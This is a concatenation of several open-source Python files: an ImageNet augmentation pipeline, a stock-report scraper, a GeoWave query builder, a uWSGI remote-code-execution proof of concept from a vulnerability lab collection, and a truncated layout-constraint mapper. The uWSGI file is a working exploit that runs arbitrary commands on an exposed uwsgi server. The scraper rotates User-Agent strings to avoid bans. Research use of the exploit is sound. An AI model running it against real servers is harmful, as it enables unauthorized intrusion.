'unsup_image1': unsup_x0,
}
return sample
def _augment_unsup_twice(unsup_sample):
"""Augment unsupervised sample, two augmentations."""
sample = {
'unsup_image0': preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'unsup_image1': preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
}
return sample
def _augment_semisup_once(sup_sample, unsup_sample):
"""Augment semi-supervised sample, single augmentation."""
unsup_x0 = preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size)
semisup_sample = {
'sup_image': preprocess_train_image(
sup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'sup_label': sup_sample['label'],
'unsup_image0': unsup_x0,
'unsup_image1': unsup_x0,
}
return semisup_sample
def _augment_semisup_twice(sup_sample, unsup_sample):
"""Augment semi-supervised sample, two augmentations."""
semisup_sample = {
'sup_image': preprocess_train_image(
sup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'sup_label': sup_sample['label'],
'unsup_image0': preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
'unsup_image1': preprocess_train_image(
unsup_sample['image'], apply_colour_jitter=apply_colour_jitter,
greyscale_prob=greyscale_prob, image_size=image_size),
}
return semisup_sample
def _process_eval_sample(x):
"""Pre-process evaluation sample."""
image = preprocess_eval_image(x['image'], image_size=image_size)
batch = {'image': image, 'label': x['label']}
return batch
if augment_twice:
train_semisup_ds = train_semisup_ds.map(_augment_semisup_twice,
num_parallel_calls=128)
train_unsup_only_ds = train_unsup_ds.map(_augment_unsup_twice,
num_parallel_calls=128)
else:
train_semisup_ds = train_semisup_ds.map(_augment_semisup_once,
num_parallel_calls=128)
train_unsup_only_ds = train_unsup_ds.map(_augment_unsup_once,
num_parallel_calls=128)
train_sup_only_ds = train_sup_ds.map(_augment_sup,
num_parallel_calls=128)
train_semisup_ds = train_semisup_ds.batch(train_batch_size,
drop_remainder=True)
train_unsup_only_ds = train_unsup_only_ds.batch(train_batch_size,
drop_remainder=True)
train_sup_only_ds = train_sup_only_ds.batch(train_batch_size,
drop_remainder=True)
train_semisup_ds = train_semisup_ds.prefetch(10)
train_unsup_only_ds = train_unsup_only_ds.prefetch(10)
train_sup_only_ds = train_sup_only_ds.prefetch(10)
self.train_semisup_ds = train_semisup_ds
self.train_unsup_ds = train_unsup_only_ds
self.train_sup_ds = train_sup_only_ds
#
# Validation set
#
if n_val > 0:
val_ds = val_ds.cache()
val_ds = val_ds.map(_process_eval_sample, num_parallel_calls=128)
val_ds = val_ds.batch(eval_batch_size)
val_ds = val_ds.repeat()
val_ds = val_ds.prefetch(10)
self.val_ds = val_ds
else:
self.val_ds = None
if load_test_set:
#
# Test set
#
test_ds = _load_tfds_imagenet('validation', TEST_IMAGES)
test_ds = test_ds.cache()
test_ds = test_ds.map(_process_eval_sample, num_parallel_calls=128)
test_ds = test_ds.batch(eval_batch_size)
test_ds = test_ds.repeat()
test_ds = test_ds.prefetch(10)
self.test_ds = test_ds
self.n_test = TEST_IMAGES
else:
self.test_ds = None
self.n_test = 0
self.n_classes = 1000
|
StockAnalysisSystem/ui/Extension/recycled/announcement_downloader.py | SleepySoft/StockAnalysisSystem | 138 | 21895 | <reponame>SleepySoft/StockAnalysisSystem<filename>StockAnalysisSystem/ui/Extension/recycled/announcement_downloader.py<gh_stars>100-1000
import time
import urllib
import random
import logging
import requests
import datetime
from os import sys, path, makedirs
from PyQt5.QtCore import Qt, QTimer, QDateTime
from PyQt5.QtWidgets import QWidget, QPushButton, QVBoxLayout, QLabel, QComboBox, QDateTimeEdit, QCheckBox, QLineEdit, \
QRadioButton
root_path = path.dirname(path.dirname(path.abspath(__file__)))
from StockAnalysisSystem.core.Utility.common import *
from StockAnalysisSystem.core.Utility.ui_utility import *
from StockAnalysisSystem.core.Utility.task_queue import *
from StockAnalysisSystem.core.Utility.time_utility import *
from StockAnalysisSystem.ui.Utility.ui_context import UiContext
from StockAnalysisSystem.interface.interface import SasInterface as sasIF
from StockAnalysisSystem.core.Utility.securities_selector import SecuritiesSelector
# 20200217: It doesn't work anymore - Move to recycled
# -------------------------------------------- class AnnouncementDownloader --------------------------------------------
# -----------------------------------------------------------
# Get code from : https://github.com/gaodechen/cninfo_process
# -----------------------------------------------------------
User_Agent = [
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0"
]
headers = {'Accept': 'application/json, text/javascript, */*; q=0.01',
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-HK;q=0.6,zh-TW;q=0.5",
'Host': 'www.cninfo.com.cn',
'Origin': 'http://www.cninfo.com.cn',
'Referer': 'http://www.cninfo.com.cn/new/commonUrl?url=disclosure/list/notice',
'X-Requested-With': 'XMLHttpRequest'
}
class AnnouncementDownloader:
def __init__(self):
pass
@staticmethod
def format_query_time_range(time_range: any) -> str:
if time_range is None:
return AnnouncementDownloader.format_query_time_range((years_ago(3), now()))
if isinstance(time_range, str):
return time_range
if isinstance(time_range, datetime.datetime):
return AnnouncementDownloader.format_query_time_range((time_range, time_range))
if not isinstance(time_range, (tuple, list)):
return AnnouncementDownloader.format_query_time_range(None)
if len(time_range) == 0:
return AnnouncementDownloader.format_query_time_range(None)
if len(time_range) == 1:
return AnnouncementDownloader.format_query_time_range((time_range[0], time_range[0]))
since = time_range[0]
until = time_range[1]
return '%s+~+%s' % (since.strftime('%Y-%m-%d'), until.strftime('%Y-%m-%d'))
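    # Illustrative results for the helper above (inputs assumed):
    #   format_query_time_range((datetime.datetime(2018, 1, 1), datetime.datetime(2020, 12, 31)))
    #       -> '2018-01-01+~+2020-12-31'
    #   format_query_time_range(None) defaults to the last three years up to today.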
@staticmethod
def get_szse_annual_report_pages(page: int, stock: str, time_range: any = None):
query_path = 'http://www.cninfo.com.cn/new/hisAnnouncement/query'
        headers['User-Agent'] = random.choice(User_Agent)  # pick a random User-Agent
time_range = AnnouncementDownloader.format_query_time_range(time_range)
        query = {'pageNum': page,  # page number
'pageSize': 30,
'tabName': 'fulltext',
                 'column': 'szse',  # SZSE (Shenzhen Stock Exchange)
'stock': stock,
'searchkey': '',
'secid': '',
'plate': 'sz',
                 'category': 'category_ndbg_szsh;',  # annual reports
'trade': '',
'seDate': time_range,
}
namelist = requests.post(query_path, headers=headers, data=query)
return namelist.json()['announcements']
@staticmethod
def get_sse_annual_report_pages(page: int, stock: str, time_range: any = None):
query_path = 'http://www.cninfo.com.cn/new/hisAnnouncement/query'
        headers['User-Agent'] = random.choice(User_Agent)  # pick a random User-Agent
time_range = AnnouncementDownloader.format_query_time_range(time_range)
        query = {'pageNum': page,  # page number
'pageSize': 30,
'tabName': 'fulltext',
'column': 'sse',
'stock': stock,
'searchkey': '',
'secid': '',
'plate': 'sh',
                 'category': 'category_ndbg_szsh;',  # annual reports
'trade': '',
'seDate': time_range
}
namelist = requests.post(query_path, headers=headers, data=query)
        return namelist.json()['announcements']  # annual report entries from the JSON response
@staticmethod
def execute_download(report_pages, include_filter: [str] or None = None,
exclude_filter: [str] or None = None, quit_flag: [bool] = None):
if report_pages is None:
return
# download_headers = {
# 'Accept': 'application/json, text/javascript, */*; q=0.01',
# 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
# 'Accept-Encoding': 'gzip, deflate',
# 'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-HK;q=0.6,zh-TW;q=0.5',
# 'Host': 'www.cninfo.com.cn',
# 'Origin': 'http://www.cninfo.com.cn'
# }
# download_headers['User-Agent'] = random.choice(User_Agent)
download_path = 'http://static.cninfo.com.cn/'
for page in report_pages:
if quit_flag is not None and quit_flag[0]:
break
title = page['announcementTitle']
allowed = AnnouncementDownloader.check_filter_allowed(title, include_filter, exclude_filter)
if not allowed:
print(' %s -> Ignore' % title)
continue
print(' %s -> Download' % title)
download = download_path + page["adjunctUrl"]
file_name = AnnouncementDownloader.format_download_path(page)
if '*' in file_name:
file_name = file_name.replace('*', '')
time.sleep(random.random() * 5)
r = requests.get(download)
f = open(file_name, "wb")
f.write(r.content)
f.close()
@staticmethod
def format_download_path(page) -> str:
file_name = page['secName'] + '_' + page['announcementTitle'] + '.pdf'
file_path = path.join(root_path, 'Download', 'report', page['secCode'])
makedirs(file_path, exist_ok=True)
return path.join(file_path, file_name)
@staticmethod
def check_filter_allowed(text: str, include_filter: [str] or None, exclude_filter: [str] or None) -> bool:
allowed = False
if include_filter is not None and len(include_filter) > 0:
for inc in include_filter:
if inc in text:
allowed = True
break
else:
allowed = True
if exclude_filter is not None and len(exclude_filter) > 0:
for exc in exclude_filter:
if exc in text:
allowed = False
break
return allowed
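    # Filtering sketch (titles assumed): with include_filter=['年年度报告'] and exclude_filter=['摘要'],
    #   '2019年年度报告'     -> True   (matches an include keyword, hits no exclude keyword)
    #   '2019年年度报告摘要' -> False  (the exclude keyword wins)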
# ----------------------------------------- Interface -----------------------------------------
@staticmethod
def download_annual_report(stock_identity: str or list, time_range: any = None, quit_flag: [bool] = None):
if not isinstance(stock_identity, (list, tuple)):
stock_identity = [stock_identity]
for identity in stock_identity:
s, f = AnnouncementDownloader.__detect_stock_code_and_page_entry(identity)
AnnouncementDownloader.__download_report_for_securities(s, f, time_range, quit_flag)
@staticmethod
def __detect_stock_code_and_page_entry(stock_identity: str) -> tuple:
if stock_identity.endswith('.SSE'):
s = stock_identity[: -4]
f = AnnouncementDownloader.get_sse_annual_report_pages
elif stock_identity.endswith('.SZSE'):
s = stock_identity[: -5]
f = AnnouncementDownloader.get_szse_annual_report_pages
else:
s = stock_identity
exchange = get_stock_exchange(stock_identity)
if exchange == 'SSE':
f = AnnouncementDownloader.get_sse_annual_report_pages
elif exchange == 'SZSE':
f = AnnouncementDownloader.get_szse_annual_report_pages
else:
f = AnnouncementDownloader.get_sse_annual_report_pages
return s, f
@staticmethod
def __download_report_for_securities(s, f, time_range, quit_flag):
page = 1
while page < 1000: # Max limit
if quit_flag is not None and quit_flag[0]:
break
try:
print('Downloading report for %s, page %s' % (s, page))
page_data = f(page, s, time_range)
if len(page_data) == 0:
break
                # keep only true annual reports ("...年年度报告" titles); drop confirmations, abstracts and cancelled filings
                AnnouncementDownloader.execute_download(page_data,
include_filter=['年年度报告'],
exclude_filter=['确认意见', '摘要', '已取消'],
quit_flag=quit_flag)
if len(page_data) != 30:
break
except Exception as e:
print(e)
print('Maybe page reaches end.')
break
finally:
page += 1
# ----------------------------------------------------------------------------------------------------------------------
ALL_STOCK_TEXT = '所有'  # "All": download reports for every listed stock
DEFAULT_INFO = '''
What this extension does: download public reports of listed companies from cninfo.com.cn
1. The download code comes from: https://github.com/gaodechen/cninfo_process
2. If you pick "自定义" (custom), set your own keywords to filter reports by title
3. The default download path is Download/report/ under the current directory
4. Download tasks occupy the system task queue and share resources with the data-update feature
   - Manage download tasks via "View -> 任务管理" (task management)
   - You may queue the next task before the previous one finishes
5. A very large time range or too many stocks may get you BANNED by the site, so do not be greedy
'''
DOWNLOAD_ALL_TIPS = '''
The next operation will download annual reports for ALL stocks.
This takes a very long time and a large amount of disk space,
********and you may get BANNED by the website********
Unless you really need this, download a few individual stocks instead.
-------------Do you want to continue?-------------
'''
# ----------------------------------- UpdateTask -----------------------------------
class AnnouncementDownloadTask(TaskQueue.Task):
REPORT_TYPE_NONE = 0
REPORT_TYPE_ANNUAL = 1
def __init__(self):
super(AnnouncementDownloadTask, self).__init__('AnnouncementDownloadTask')
self.__quit_flag = [False]
# Modules
self.sas_if: sasIF = None
self.task_manager: TaskQueue = None
# self.data_utility = None
# Parameters
self.securities = ''
self.period_since = None
self.period_until = None
self.filter_include = []
self.filter_exclude = []
self.report_type = AnnouncementDownloadTask.REPORT_TYPE_ANNUAL
def run(self):
try:
self.__execute_update()
except Exception as e:
print(e)
print('Continue...')
finally:
print('Finished')
def quit(self):
self.__quit_flag[0] = True
def identity(self) -> str:
return 'Download Report: ' + self.securities
def __execute_update(self):
if self.securities == ALL_STOCK_TEXT:
stock_list = self.sas_if.sas_get_stock_info_list()
for stock_identity, stock_name in stock_list:
if self.__quit_flag is not None and self.__quit_flag[0]:
break
# self.__build_sub_update(stock_identity)
AnnouncementDownloader.download_annual_report(stock_identity, (self.period_since, self.period_until),
self.__quit_flag)
elif self.report_type == AnnouncementDownloadTask.REPORT_TYPE_ANNUAL:
AnnouncementDownloader.download_annual_report(self.securities, (self.period_since, self.period_until),
self.__quit_flag)
else:
pass
# def __build_sub_update(self, securities: str):
# task = AnnouncementDownloadTask()
# task.securities = securities
# task.period_since = self.period_since
# task.period_until = self.period_until
# task.filter_include = self.filter_include
# task.filter_exclude = self.filter_exclude
# task.report_type = self.report_type
# task.task_manager = self.task_manager
# self.task_manager.append_task(task)
# ----------------------------- AnnouncementDownloaderUi -----------------------------
class AnnouncementDownloaderUi(QWidget):
def __init__(self, sas_if: sasIF, task_manager):
super(AnnouncementDownloaderUi, self).__init__()
# ---------------- ext var ----------------
self.__sas_if = sas_if
# self.__data_center = self.__data_hub.get_data_center() if self.__data_hub is not None else None
# self.__data_utility = self.__data_hub.get_data_utility() if self.__data_hub is not None else None
self.__task_manager = task_manager
self.__translate = QtCore.QCoreApplication.translate
# Timer for update stock list
self.__timer = QTimer()
self.__timer.setInterval(1000)
self.__timer.timeout.connect(self.on_timer)
self.__timer.start()
# Ui component
self.__combo_name = SecuritiesSelector(self.__sas_if, self)
self.__radio_annual_report = QRadioButton('年报')
self.__radio_customize_filter = QRadioButton('自定义')
self.__line_filter_include = QLineEdit()
self.__line_filter_exclude = QLineEdit()
self.__button_download = QPushButton('确定')
self.__datetime_since = QDateTimeEdit(QDateTime.currentDateTime().addYears(-3))
self.__datetime_until = QDateTimeEdit(QDateTime.currentDateTime())
self.init_ui()
# ---------------------------------------------------- UI Init -----------------------------------------------------
def init_ui(self):
self.__layout_control()
self.__config_control()
def __layout_control(self):
main_layout = QVBoxLayout()
self.setLayout(main_layout)
main_layout.addLayout(horizon_layout([QLabel('股票代码'), self.__combo_name], [1, 10]))
main_layout.addLayout(horizon_layout([QLabel('报告起始'), self.__datetime_since], [1, 10]))
main_layout.addLayout(horizon_layout([QLabel('报告截止'), self.__datetime_until], [1, 10]))
main_layout.addLayout(horizon_layout([QLabel('报告类型'), self.__radio_annual_report,
self.__radio_customize_filter], [1, 5, 5]))
main_layout.addLayout(horizon_layout([QLabel('包含词条(以,分隔)'), self.__line_filter_include], [1, 10]))
main_layout.addLayout(horizon_layout([QLabel('排除词条(以,分隔)'), self.__line_filter_exclude], [1, 10]))
main_layout.addWidget(QLabel(DEFAULT_INFO))
main_layout.addWidget(self.__button_download)
def __config_control(self):
# self.__combo_name.setEditable(True)
# self.__combo_name.addItem('所有')
# self.__combo_name.addItem('股票列表载入中')
self.__radio_annual_report.setChecked(True)
self.__line_filter_include.setEnabled(False)
self.__line_filter_exclude.setEnabled(False)
self.__radio_customize_filter.setEnabled(False)
self.__radio_annual_report.clicked.connect(self.on_radio_report_type)
self.__radio_customize_filter.clicked.connect(self.on_radio_report_type)
self.__button_download.clicked.connect(self.on_button_download)
def on_timer(self):
if self.__combo_name.count() > 1:
self.__combo_name.insertItem(0, ALL_STOCK_TEXT)
self.__combo_name.setCurrentIndex(0)
self.__timer.stop()
# # Check stock list ready and update combobox
# if self.__data_utility is not None:
# if self.__data_utility.stock_cache_ready():
# self.__combo_name.clear()
# self.__combo_name.addItem(ALL_STOCK_TEXT)
# stock_list = self.__data_utility.get_stock_list()
# for stock_identity, stock_name in stock_list:
# self.__combo_name.addItem(stock_identity + ' | ' + stock_name, stock_identity)
def on_radio_report_type(self):
if self.__radio_annual_report.isChecked():
self.__line_filter_include.setEnabled(False)
self.__line_filter_exclude.setEnabled(False)
else:
self.__line_filter_include.setEnabled(True)
self.__line_filter_exclude.setEnabled(True)
def on_button_download(self):
# input_securities = self.__combo_name.currentText()
# if '|' in input_securities:
# input_securities = input_securities.split('|')[0].strip()
input_securities = self.__combo_name.get_input_securities()
if input_securities == ALL_STOCK_TEXT:
if self.__sas_if is None:
QMessageBox.information(self,
QtCore.QCoreApplication.translate('main', '提示'),
QtCore.QCoreApplication.translate('main', '无法获取股票列表'),
QMessageBox.Yes, QMessageBox.No)
return
reply = QMessageBox.question(self,
QtCore.QCoreApplication.translate('main', '操作确认'),
QtCore.QCoreApplication.translate('main', DOWNLOAD_ALL_TIPS),
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No)
if reply != QMessageBox.Yes:
return
self.__build_download_task(input_securities)
def __build_download_task(self, securities: str):
task = AnnouncementDownloadTask()
task.securities = securities
task.period_since = self.__datetime_since.dateTime().toPyDateTime()
task.period_until = self.__datetime_until.dateTime().toPyDateTime()
task.filter_include = self.__line_filter_include.text().split(',')
task.filter_exclude = self.__line_filter_exclude.text().split(',')
task.report_type = \
AnnouncementDownloadTask.REPORT_TYPE_ANNUAL \
if self.__radio_annual_report.isChecked() else \
AnnouncementDownloadTask.REPORT_TYPE_NONE
task.task_manager = self.__task_manager
task.sas_if = self.__sas_if
# task.data_utility = self.__data_utility
if self.__task_manager is not None:
self.__task_manager.append_task(task)
else:
task.run()
# ----------------------------------------------------------------------------------------------------------------------
def plugin_prob() -> dict:
return {
'plugin_id': 'efa60977-65e9-4ecf-9271-7c6e629da399',
'plugin_name': 'ReportDownloader',
'plugin_version': '0.0.0.1',
'tags': ['Announcement', 'Report', 'Finance Report', 'Annual Report', 'Sleepy'],
}
def plugin_adapt(method: str) -> bool:
return method in ['widget']
def plugin_capacities() -> list:
return ['widget']
# ----------------------------------------------------------------------------------------------------------------------
sasInterface = None
def init(sas_if) -> bool:
try:
global sasInterface
sasInterface = sas_if
except Exception as e:
pass
finally:
pass
return True
def widget(parent: QWidget, **kwargs) -> (QWidget, dict):
ui_context: UiContext = kwargs.get('ui_context', None)
task_manager = None if ui_context is None else ui_context.get_task_queue()
return AnnouncementDownloaderUi(sasInterface, task_manager), \
{'name': '年报下载', 'show': False}
# ----------------------------------------------------------------------------------------------------------------------
def main():
app = QApplication(sys.argv)
dlg = WrapperQDialog(AnnouncementDownloaderUi(None, None))
dlg.exec()
# ----------------------------------------------------------------------------------------------------------------------
def exception_hook(type, value, tback):
# log the exception here
print('Exception hook triggered.')
print(type)
print(value)
print(tback)
# then call the default handler
sys.__excepthook__(type, value, tback)
if __name__ == "__main__":
sys.excepthook = exception_hook
try:
main()
except Exception as e:
print('Error =>', e)
print('Error =>', traceback.format_exc())
exit()
finally:
pass
|
python/src/main/python/pygw/query/aggregation_query_builder.py | radiant-maxar/geowave | 280 | 21900 | <reponame>radiant-maxar/geowave
#
# Copyright (c) 2013-2020 Contributors to the Eclipse Foundation
#
# See the NOTICE file distributed with this work for additional information regarding copyright
# ownership. All rights reserved. This program and the accompanying materials are made available
# under the terms of the Apache License, Version 2.0 which accompanies this distribution and is
# available at http://www.apache.org/licenses/LICENSE-2.0.txt
# ===============================================================================================
from .base_query_builder import BaseQueryBuilder
from .aggregation_query import AggregationQuery
from ..base.type_conversions import StringArrayType
class AggregationQueryBuilder(BaseQueryBuilder):
"""
A builder for creating aggregation queries. This class should not be used directly. Instead, use one of the derived
classes such as `pygw.query.vector.VectorAggregationQueryBuilder`.
"""
def __init__(self, java_ref):
super().__init__(java_ref)
def count(self, *type_names):
"""
        This is a convenience method to set the count aggregation. If no type
        names are given, every type is counted.
Args:
type_names (str): The type names to count results.
Returns:
This query builder.
"""
        if not type_names:
self._java_ref.count()
else:
self._java_ref.count(StringArrayType().to_java(type_names))
return self
def aggregate(self, type_name, j_aggregation):
"""
Provide the Java Aggregation function and the type name to apply the aggregation on.
Args:
type_name (str): The type name to aggregate.
            j_aggregation (Aggregation): The Java aggregation function to apply.
Returns:
This query builder.
"""
        self._java_ref.aggregate(type_name, j_aggregation)
        return self
def build(self):
"""
Builds the configured aggregation query.
Returns:
The final constructed `pygw.query.AggregationQuery`.
"""
return AggregationQuery(self._java_ref.build(), self._java_transformer)
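# Illustrative usage sketch (comments only, not part of this module). It assumes a
# concrete derived builder such as pygw.query.vector.VectorAggregationQueryBuilder
# and an already-configured GeoWave data store; `store` and 'my_type' are placeholders.
#
#   builder = VectorAggregationQueryBuilder()
#   query = builder.count('my_type').build()   # count() returns the builder, build() the AggregationQuery
#   result = store.aggregate(query)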
|
uwsgi/unacc/poc.py | nobgr/vulhub | 9,681 | 21902 | #!/usr/bin/python
# coding: utf-8
######################
# Uwsgi RCE Exploit
######################
# Author: <EMAIL>
# Created: 2017-7-18
# Last modified: 2018-1-30
# Note: Just for research purpose
import sys
import socket
import argparse
import requests
def sz(x):
s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')
s = bytes.fromhex(s) if sys.version_info[0] == 3 else s.decode('hex')
return s[::-1]
def pack_uwsgi_vars(var):
pk = b''
for k, v in var.items() if hasattr(var, 'items') else var:
pk += sz(k) + k.encode('utf8') + sz(v) + v.encode('utf8')
result = b'\x00' + sz(pk) + b'\x00' + pk
return result
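# Behaviour sketch of the packet produced above (illustrative comments only):
# uwsgi's modifier1 (0), a 16-bit little-endian payload size, modifier2 (0), then
# each variable encoded as <u16-LE key length><key><u16-LE value length><value>.
#
#   pack_uwsgi_vars({'PATH_INFO': '/'})
#   # -> b'\x00\x0e\x00\x00' + b'\x09\x00PATH_INFO\x01\x00/'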
def parse_addr(addr, default_port=None):
port = default_port
if isinstance(addr, str):
if addr.isdigit():
addr, port = '', addr
elif ':' in addr:
addr, _, port = addr.partition(':')
elif isinstance(addr, (list, tuple, set)):
addr, port = addr
port = int(port) if port else port
return (addr or '127.0.0.1', port)
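# Behaviour sketch for parse_addr (illustrative comments only):
#
#   parse_addr('192.168.3.11:5000')   # -> ('192.168.3.11', 5000)
#   parse_addr('5000')                # -> ('127.0.0.1', 5000)  bare port falls back to localhost
#   parse_addr(('10.0.0.1', '3031'))  # -> ('10.0.0.1', 3031)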
def get_host_from_url(url):
if '//' in url:
url = url.split('//', 1)[1]
host, _, url = url.partition('/')
return (host, '/' + url)
def fetch_data(uri, payload=None, body=None):
if 'http' not in uri:
uri = 'http://' + uri
s = requests.Session()
# s.headers['UWSGI_FILE'] = payload
if body:
        try:
            import urlparse  # Python 2
        except ImportError:
            import urllib.parse as urlparse  # Python 3
body_d = dict(urlparse.parse_qsl(urlparse.urlsplit(body).path))
d = s.post(uri, data=body_d)
else:
d = s.get(uri)
return {
'code': d.status_code,
'text': d.text,
'header': d.headers
}
def ask_uwsgi(addr_and_port, mode, var, body=''):
if mode == 'tcp':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(parse_addr(addr_and_port))
elif mode == 'unix':
s = socket.socket(socket.AF_UNIX)
s.connect(addr_and_port)
s.send(pack_uwsgi_vars(var) + body.encode('utf8'))
response = []
    # Actually we don't need the response; it will block if we run any commands.
# So I comment all the receiving stuff.
# while 1:
# data = s.recv(4096)
# if not data:
# break
# response.append(data)
s.close()
return b''.join(response).decode('utf8')
def curl(mode, addr_and_port, payload, target_url):
host, uri = get_host_from_url(target_url)
path, _, qs = uri.partition('?')
if mode == 'http':
return fetch_data(addr_and_port+uri, payload)
elif mode == 'tcp':
host = host or parse_addr(addr_and_port)[0]
else:
host = addr_and_port
var = {
'SERVER_PROTOCOL': 'HTTP/1.1',
'REQUEST_METHOD': 'GET',
'PATH_INFO': path,
'REQUEST_URI': uri,
'QUERY_STRING': qs,
'SERVER_NAME': host,
'HTTP_HOST': host,
'UWSGI_FILE': payload,
'SCRIPT_NAME': target_url
}
return ask_uwsgi(addr_and_port, mode, var)
def main(*args):
desc = """
This is a uwsgi client & RCE exploit.
    Last modified at 2018-01-30 by <EMAIL>
"""
elog = "Example:uwsgi_exp.py -u 192.168.3.11:5000 -c \"echo 111>/tmp/abc\""
parser = argparse.ArgumentParser(description=desc, epilog=elog)
parser.add_argument('-m', '--mode', nargs='?', default='tcp',
help='Uwsgi mode: 1. http 2. tcp 3. unix. The default is tcp.',
dest='mode', choices=['http', 'tcp', 'unix'])
parser.add_argument('-u', '--uwsgi', nargs='?', required=True,
help='Uwsgi server: 192.168.3.11:5000 or /tmp/uwsgi.sock',
dest='uwsgi_addr')
parser.add_argument('-c', '--command', nargs='?', required=True,
help='Command: The exploit command you want to execute, must have this.',
dest='command')
if len(sys.argv) < 2:
parser.print_help()
return
args = parser.parse_args()
if args.mode.lower() == "http":
print("[-]Currently only tcp/unix method is supported in RCE exploit.")
return
    payload = 'exec://' + args.command + "; echo test"  # must have something in the output or uWSGI crashes.
print("[*]Sending payload.")
print(curl(args.mode.lower(), args.uwsgi_addr, payload, '/testapp'))
if __name__ == '__main__':
main() |
align/pnr/write_constraint.py | ALIGN-analoglayout/ALIGN-public | 119 | 21925 | <gh_stars>100-1000
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 13 14:50:24 2021
@author: kunal001
"""
import pathlib
import pprint
import json
import logging
from ..schema import constraint
logger = logging.getLogger(__name__)
pp = pprint.PrettyPrinter(indent=4)
class PnRConstraintWriter:
def __init__(self):
pass
def map_valid_const(self,all_const):
"""
Maps input format to pnr format
"""
logger.debug(f"input constraints {all_const}")
#Start mapping
pnr_const=[]
for input_const in constraint.expand_user_constraints(all_const):
# Create dict for PnR constraint
# and handle common field aliasing
const = input_const.dict(
exclude = {'constraint'},
exclude_unset=True)
const['const_name'] = input_const.__class__.__name__
if 'instances' in const:
const['blocks'] = const['instances']
del const['instances']
# Add dict to PnR constraint list
if not const['const_name'] in ('NetConst', 'PortLocation', 'MultiConnection'):
pnr_const.append(const)
# Constraint-specific field transformations
if const["const_name"] == 'Order':
const["const_name"] = 'Ordering'
if const["direction"] in ("left_to_right", "horizontal"):
const["direction"] = 'H'
elif const["direction"] in ("top_to_bottom", "vertical"):
const["direction"] = 'V'
else:
raise NotImplementedError(f'PnR does not support direction {const["direction"]} yet')
elif const["const_name"] == 'SameTemplate':
                logger.info(f'found a SameTemplate: {const}')
elif const["const_name"] == 'MatchBlocks':
const["const_name"] = 'MatchBlock'
const['block1'] = const['blocks'][0]
const['block2'] = const['blocks'][1]
del const['blocks']
elif const["const_name"] == 'BlockDistance':
const["const_name"] = 'bias_graph'
const["distance"] = const.pop('abs_distance')
elif const["const_name"] == 'HorizontalDistance':
const["const_name"] = 'bias_Hgraph'
const["distance"] = const.pop('abs_distance')
elif const["const_name"] == 'VerticalDistance':
const["const_name"] = 'bias_Vgraph'
const["distance"] = const.pop('abs_distance')
elif const["const_name"] == 'AspectRatio':
const["const_name"] = 'Aspect_Ratio'
del const['subcircuit']
elif const["const_name"] == 'Boundary':
del const['subcircuit']
for key in ['max_width', 'max_height']:
if const[key] is None:
del const[key]
elif const["const_name"] == 'SymmetricBlocks':
const["const_name"] = 'SymmBlock'
const["axis_dir"] = const.pop("direction")
pairs = []
for blocks in const["pairs"]:
if len(blocks)==1:
temp = {
"type": "selfsym",
"block": blocks[0]
}
elif len(blocks)==2:
temp = {
"type":"sympair",
"block1":blocks[0],
"block2":blocks[1]
}
else:
logger.warning(f"invalid group for symmetry {blocks}")
pairs.append(temp)
const["pairs"] = pairs
elif const["const_name"] == 'GroupCaps':
const["const_name"] = 'CC'
const["cap_name"] = const.pop("name").upper()
const["unit_capacitor"] = const.pop("unit_cap").upper()
const["size"] = const.pop("num_units")
const["nodummy"] = not const["dummy"]
const["cap_r"] = -1
const["cap_s"] = -1
del const["dummy"]
del const["blocks"]
elif const["const_name"] == 'Align':
const["const_name"] = 'AlignBlock'
if const['line'] not in ['h_bottom', 'h_top', 'v_right', 'v_left', 'v_center']:
raise NotImplementedError(f'PnR does not support edge {const["line"]} yet')
elif const["const_name"] == 'SymmetricNets':
const["const_name"] = 'SymmNet'
const["axis_dir"] = const.pop("direction")
if "pins1" in const and "pins2" in const:
pins1 = self._map_pins(const["pins1"])
pins2 = self._map_pins(const["pins2"])
del const["pins1"]
del const["pins2"]
else:
pins1 = [{"type": "dummy", "name": "dummy", "pin": None}]
pins2 = [{"type": "dummy", "name": "dummy", "pin": None}]
const['net1'] = {
"name": const['net1'],
"blocks": pins1}
const['net2'] = {
"name": const['net2'],
"blocks": pins2}
elif const["const_name"] == 'PortLocation':
